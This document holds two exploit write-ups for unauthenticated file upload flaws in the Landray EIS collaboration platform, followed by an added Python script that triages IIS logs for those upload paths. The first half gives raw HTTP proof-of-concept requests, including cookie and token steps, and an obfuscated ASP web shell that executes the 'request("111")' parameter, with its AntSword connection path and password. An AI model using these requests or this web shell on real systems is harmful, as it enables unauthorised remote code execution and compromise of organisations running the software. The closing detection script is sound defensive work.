Landray EIS frm_form_upload.aspx endpoint: unauthenticated arbitrary file upload vulnerability
app="Landray-EIS智慧协同平台"
Vulnerable endpoint: visit http://xxx/frm/frm_form_upload.aspx
If the response status code is 200 or 500, the vulnerability is present; 500 means it is vulnerable but no cookies were sent. Capture the request to the original address to obtain the first part of the cookies, then append FIOA_IMG_FOLDER=FI; Lang=zh-cn
With the cookies assembled, visit /frm/frm_form_upload.aspx again to obtain the CSRF token; this token goes into the __VIEWSTATE parameter of the PoC below.
PoC:
POST /frm/frm_form_upload.aspx HTTP/1.1
Host:
Cookie: FIOA_IMG_FOLDER=FI; Lang=zh-cn; ASP.NET_SessionId=j……5
Content-Type: multipart/form-data; boundary=4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Length: 2871
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.9582.25 Safari/537.36
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__VIEWSTATE"
value obtained in step 3
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTTARGET"
GB_SAVE
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="__EVENTARGUMENT"
保存
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308
Content-Disposition: form-data; name="tpfile"; filename="xnwafhpcm.aspx"
Content-Type: image/png
……
--4904f4eac733be94e1c5f7feee3da00169109af9219ca783f8a987957308--
Uploaded file location: http://xxx/frm/frm_pics/2…….aspx
Landray EIS arbitrary file upload vulnerability
EXP:
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 192
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="Oracle.asp"
Content-Type: text/html
<%
<!--
Class C8t6
public property let SXEWH(DlB2YiH48)
exeCute(DlB2YiH48)REM IXMQD)
end property
End Class
Set a= New C8t6
a.SXEWH= request("111")
-->
%>
------WebKitFormBoundaryxdgaqmqu--
AntSword connection address: /files/editor_img/xxxx.asp (the uploaded file is renamed with a timestamp, but the new name can be seen in the response)
Password: 111
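A defender-side triage script for the two upload paths these posts describe, added here as an example; it is not part of either post and not Landray code. It assumes IIS W3C extended logging (the platform is ASP.NET) and runs over constructed log lines embedded in the script. The request paths /frm/frm_form_upload.aspx, /eis/service/api.aspx?action=saveImg, /frm/frm_pics/ and /files/editor_img/ come from the posts above; the log field order, the client IPs and the list of script extensions are assumptions. It flags POSTs to the upload endpoints and, separately, any request for a server-side script file inside the image folders, which is the observable sign that an upload restriction was bypassed.

```python
"""Triage IIS W3C logs for the Landray EIS upload paths described above.

Added example (not from the original posts). Log lines below are constructed.
"""
from collections import defaultdict
from pathlib import PurePosixPath

# Endpoints named in the posts (paths only; hosts are placeholders there too).
UPLOAD_ENDPOINTS = {"/frm/frm_form_upload.aspx", "/eis/service/api.aspx"}
# Folders where the posts say uploaded files land.
UPLOAD_DIRS = ("/frm/frm_pics/", "/files/editor_img/")
# Assumed: extensions IIS/ASP.NET executes; an image folder must never serve these.
SCRIPT_EXTENSIONS = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed IIS W3C sample: one client per scenario, plus a benign client.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2024-01-01 10:00:01 10.0.0.5 GET /frm/frm_form_upload.aspx - 80 203.0.113.9 Mozilla/5.0 500
2024-01-01 10:00:02 10.0.0.5 GET /frm/frm_form_upload.aspx - 80 203.0.113.9 Mozilla/5.0 200
2024-01-01 10:00:03 10.0.0.5 POST /frm/frm_form_upload.aspx - 80 203.0.113.9 Mozilla/5.0 200
2024-01-01 10:00:04 10.0.0.5 GET /frm/frm_pics/20240101100003.aspx - 80 203.0.113.9 Mozilla/5.0 200
2024-01-01 10:00:10 10.0.0.5 POST /eis/service/api.aspx action=saveImg 80 198.51.100.7 Mozilla/5.0 200
2024-01-01 10:00:11 10.0.0.5 GET /files/editor_img/1704103210.asp - 80 198.51.100.7 Mozilla/5.0 200
2024-01-01 10:00:20 10.0.0.5 GET /frm/frm_pics/logo.png - 80 192.0.2.44 Mozilla/5.0 200
2024-01-01 10:00:21 10.0.0.5 GET /eis/service/api.aspx action=getImg 80 192.0.2.44 Mozilla/5.0 200
"""


def is_suspicious_upload_name(filename: str) -> bool:
    """True if any extension in the name is a server-side script extension.

    PurePosixPath.suffixes sees every extension ("a.asp.png" -> .asp, .png),
    so a double-extension name is caught, not only the final extension.
    """
    suffixes = {s.lower() for s in PurePosixPath(filename).suffixes}
    return bool(suffixes & SCRIPT_EXTENSIONS)


def parse_w3c(lines):
    """Parse W3C extended log lines into dicts keyed by the #Fields names."""
    fields, records = None, []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields header
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def is_upload_post(rec) -> bool:
    """POST to an upload endpoint; api.aspx only counts with action=saveImg."""
    if rec["cs-method"].upper() != "POST":
        return False
    stem = rec["cs-uri-stem"].lower()
    if stem == "/frm/frm_form_upload.aspx":
        return True
    if stem == "/eis/service/api.aspx":
        return "action=saveimg" in rec["cs-uri-query"].lower()
    return False


def is_script_in_upload_dir(rec) -> bool:
    """Any request for a script-extension file under an upload folder."""
    stem = rec["cs-uri-stem"]
    return stem.lower().startswith(UPLOAD_DIRS) and is_suspicious_upload_name(stem)


def triage(lines):
    """Per-client summary of upload POSTs and script hits; benign clients omitted."""
    summary = defaultdict(lambda: {"upload_posts": 0, "script_hits": 0, "script_paths": []})
    for rec in parse_w3c(lines):
        entry = summary[rec["c-ip"]]
        if is_upload_post(rec):
            entry["upload_posts"] += 1
        if is_script_in_upload_dir(rec):
            entry["script_hits"] += 1
            entry["script_paths"].append(rec["cs-uri-stem"])
    return {ip: e for ip, e in summary.items() if e["upload_posts"] or e["script_hits"]}


if __name__ == "__main__":
    for ip, entry in triage(SAMPLE_LOG.splitlines()).items():
        print(ip, entry)
```

A script hit in an upload folder is the higher-confidence indicator of the two: the POSTs also occur during legitimate use, whereas a .asp or .aspx file being served from /frm/frm_pics/ or /files/editor_img/ should not happen at all. The same extension check, applied at write time to the multipart filename and paired with a handler mapping that refuses to execute anything under those folders, is the mitigation these write-ups point at.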